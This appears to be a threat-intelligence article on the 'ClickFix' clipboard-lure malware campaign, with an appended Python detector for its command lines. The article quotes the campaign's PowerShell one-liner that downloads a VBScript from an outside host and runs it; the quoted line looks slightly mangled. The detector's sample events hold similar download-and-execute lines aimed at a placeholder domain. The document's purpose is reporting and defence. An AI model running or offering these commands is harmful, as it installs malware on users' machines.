In mid-2025, Lab539 researchers observed an unexpected surge in a novel browser-based malware campaign dubbed “ClickFix.”
Emerging quietly in July, the threat quickly expanded its reach by registering over 13,000 unique domains designed to lure users into executing malicious commands on their own devices.
The attack leverages compromised or low-cost hosting infrastructure, including a significant portion behind Cloudflare, to deliver payloads via deceptively benign web prompts.
Users encountering these sites are first challenged with a CAPTCHA before being instructed to run a command from their clipboard, granting attackers the ability to deploy arbitrary scripts or executables.
Initially, the volume of ClickFix domains appeared unremarkable amid the vast sea of adversary activity.
However, by mid-August, a remarkable spike raised alarms across multiple threat-intelligence platforms.
Lab539 analysts noted the sudden proliferation of front-end sites that frontload malware delivery under the guise of “verification” steps, a hallmark that distinguishes ClickFix from more traditional phishing or watering-hole attacks.
The scale of domain registration suggested an automated provisioning pipeline, likely fueled by pay-as-you-go registrar services and resold hosting, rather than the manual setup favored by advanced persistent threat actors.
Despite Cloudflare’s dominance among hosting providers, accounting for about 24% of observed ClickFix domains, the campaign’s long tail of nearly 500 other providers reveals a strategic use of diverse infrastructure to evade simple blocklists.
Regional VPS services in the United States, Germany, Indonesia, and Brazil feature prominently, reflecting both global distribution and opportunistic compromise of third-party servers.
In many cases, attackers repurpose stale or misconfigured subdomains—such as decades-old academic or municipal hosts—to blend malicious traffic with legitimate DNS records.
Infection Mechanism and Payload Delivery
The core infection mechanism relies on leveraging the browser’s clipboard API to plant a command that the user unwittingly pastes into a terminal.
Once the CAPTCHA completes, the site writes a PowerShell command sequence like the following to the clipboard:
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMPcaptcha.vbs; Start-Process $env:TEMPcaptcha.vbs
This single line downloads and executes a VBScript payload without further user interaction, exemplifying the campaign’s emphasis on social engineering over exploit chaining.
Variations include direct executable downloads and obfuscated scripts, indicating multiple operators employing the ClickFix framework.
The ubiquity of this mechanism underscores how minimal technical sophistication can still yield large-scale intrusion opportunities when combined with automated domain registration and global hosting assets.
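As an added detection example (not code from the article or from Lab539), the Python below scores process-creation command lines for the traits of the ClickFix one-liner quoted above: cmd.exe starting a minimized PowerShell, a web download, a script dropped under $env:TEMP, and follow-on execution of that file. The download rule generalizes beyond curl.exe to common PowerShell equivalents; the sample records and the domain in them are constructed.

```python
import re

# Added detection example, not code from the article or from Lab539. Each rule is one trait of
# the ClickFix one-liner quoted above; matched case-insensitively against a full command line.
RULES = [
    # cmd.exe used as a launcher for PowerShell (cmd /c start ... powershell)
    ("cmd_launches_powershell", re.compile(r"\bcmd(\.exe)?\s+/c\s+start\b.*\bpowershell\b", re.I)),
    # console window minimized so the victim does not see it
    ("minimized_window", re.compile(r"\bstart\s+/min\b", re.I)),
    # a download primitive (curl.exe on the page; common PowerShell equivalents generalized)
    ("web_download", re.compile(r"\b(curl(\.exe)?|wget|invoke-webrequest|iwr|downloadstring|downloadfile)\b", re.I)),
    # payload written under %TEMP% with a script or executable extension
    ("script_dropped_in_temp", re.compile(r"\$env:temp\\?[\w-]+\.(vbs|js|hta|ps1|bat|cmd|exe)\b", re.I)),
    # the dropped file is executed in the same line
    ("follow_on_execution", re.compile(r"\b(start-process|wscript|cscript|mshta|iex|invoke-expression)\b", re.I)),
]
THRESHOLD = 3  # alert when at least three independent traits co-occur; tune per environment

# Constructed sample records (Sysmon Event ID 1 style); the domain is a placeholder, not an IoC.
SAMPLE_EVENTS = [
    {"record_id": 1, "cmdline": r"cmd /c start /min powershell -Command curl.exe -s "
                                r"https://captcha-lure.example/captcha.txt -o $env:TEMP\captcha.vbs; "
                                r"Start-Process $env:TEMP\captcha.vbs"},
    {"record_id": 2, "cmdline": r"powershell -Command Get-ChildItem $env:TEMP | Remove-Item -Recurse -Force"},
    {"record_id": 3, "cmdline": r'powershell -w hidden -c "iwr https://captcha-lure.example/update.exe '
                                r'-OutFile $env:TEMP\update.exe; Start-Process $env:TEMP\update.exe"'},
    {"record_id": 4, "cmdline": r"cmd /c start /min notepad.exe C:\Users\me\notes.txt"},
]


def score_command(cmdline: str):
    """Return (score, names of the rules that matched) for one command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    return len(hits), hits


def find_clickfix_like(events, threshold: int = THRESHOLD):
    """Return the records whose command line reaches the threshold, with the traits that fired."""
    findings = []
    for ev in events:
        score, hits = score_command(ev["cmdline"])
        if score >= threshold:
            findings.append({"record_id": ev["record_id"], "score": score, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in find_clickfix_like(SAMPLE_EVENTS):
        print(f"record {f['record_id']}: score {f['score']} traits={f['hits']}")
```

Record 2 shows why a single trait such as a $env:TEMP reference is not enough on its own; the benign cleanup command scores zero while the executable-download variant in record 3 still crosses the threshold.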